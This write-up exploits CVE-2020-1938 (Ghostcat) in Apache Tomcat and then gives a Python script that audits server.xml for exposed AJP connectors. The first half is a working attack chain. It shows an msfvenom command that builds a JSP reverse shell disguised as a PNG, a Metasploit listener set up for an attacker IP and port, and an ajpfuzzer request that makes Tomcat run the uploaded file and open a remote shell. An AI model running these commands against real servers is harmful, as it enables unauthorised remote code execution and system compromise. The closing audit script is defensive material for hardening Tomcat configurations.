CVE-2020-1938 (RCE exploitation)
1. Generate a reverse-shell payload with msf and start a listener
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.223.129 LPORT=6666 R > shell.png
Assume that, via an upload point, this "image" has been uploaded to the target server as /log/shell.png.
Start the listener in msf:
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload java/jsp_shell_reverse_tcp
payload => java/jsp_shell_reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.223.129
lhost => 192.168.223.129
msf exploit(multi/handler) > set lport 6666
lport => 6666
msf exploit(multi/handler) > exploit
2. Send an AJP packet and obtain a shell
Use an AJP packet construction tool to send the AJP packet; taking ajpfuzzer as an example:
Run: java -jar ajpfuzzer_v0.6.jar
Connect to the target port: connect 192.168.223.1 8009
Execute the following command:
forwardrequest 2 "HTTP/1.1" "/123.jsp" 192.168.223.1 192.168.223.1 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:/","javax.servlet.include.path_info:log/shell.png","javax.servlet.include.servlet_path:/"
Once the request has been sent, shell.png is parsed as a JSP (the javax.servlet.include.* request attributes make Tomcat treat the request as an include of log/shell.png), and a shell on the target server is obtained.
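The request above only works because the AJP connector on port 8009 accepts request attributes from any unauthenticated client. The following audit script is an added example, not part of the original write-up or of Tomcat: it parses a server.xml and flags AJP connectors that are still exposed, i.e. not bound to loopback or lacking a shared secret (the address, secretRequired and secret connector attributes are Tomcat's own; both sample configurations are constructed here).

```python
"""Audit a Tomcat server.xml for AJP connectors reachable by CVE-2020-1938-style
requests. Added example; attribute names follow Tomcat's Connector documentation."""
import xml.etree.ElementTree as ET

# Constructed sample: the pre-9.0.31 default, AJP on every interface, no secret.
WEAK_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" />
  <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
</Service></Server>"""

# Constructed sample: bound to loopback and requiring a shared secret.
HARDENED_SERVER_XML = """<Server><Service name="Catalina">
  <Connector port="8080" protocol="HTTP/1.1" />
  <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
             secretRequired="true" secret="REPLACE_WITH_RANDOM_SECRET" />
</Service></Server>"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def audit_ajp_connectors(server_xml: str) -> list:
    """Return one finding string per AJP connector that is still exposed.

    A connector counts as exposed when it listens on a non-loopback address
    (the old default when 'address' is absent) or has no shared secret, since
    either lets an unauthenticated client hand request attributes such as
    javax.servlet.include.path_info to the AJP port.
    """
    findings = []
    root = ET.fromstring(server_xml)
    for conn in root.iter("Connector"):
        # Connectors without a protocol attribute default to HTTP/1.1.
        if not conn.get("protocol", "").upper().startswith("AJP"):
            continue
        port = conn.get("port", "?")
        address = conn.get("address")  # None means all interfaces (pre-9.0.31)
        if address is None or address not in LOOPBACK:
            findings.append(f"AJP port {port}: listens on {address or 'all interfaces'}")
        # secretRequired="true" without a secret prevents startup, so the
        # presence of 'secret' is the check that matters.
        if not conn.get("secret"):
            findings.append(f"AJP port {port}: no shared secret configured")
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SERVER_XML), ("hardened", HARDENED_SERVER_XML)):
        print(name, audit_ajp_connectors(cfg) or ["no exposed AJP connector"])
```

A server.xml with the AJP connector commented out entirely (the default since Tomcat 9.0.31) produces no findings, which is the preferred state when no AJP proxy is in use.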